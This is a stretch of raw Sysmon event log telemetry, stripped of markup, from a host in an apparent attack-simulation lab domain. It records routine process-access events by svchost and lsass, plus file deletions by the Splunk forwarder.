07:49:10.953{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001047781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.821{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=630548C7B73B1A5B02557A27E1C3DC8C,SHA256=F3140EF4C8C699009FF3F39043740BC45DEF69CF987F7838798C400C58658383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEA818101FA3AE565AD951AEAB47DB5,SHA256=5BB4EFA219D105AAEDC487B3991431BD59C91B5AF5EDB6E249A6D6204E6618D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 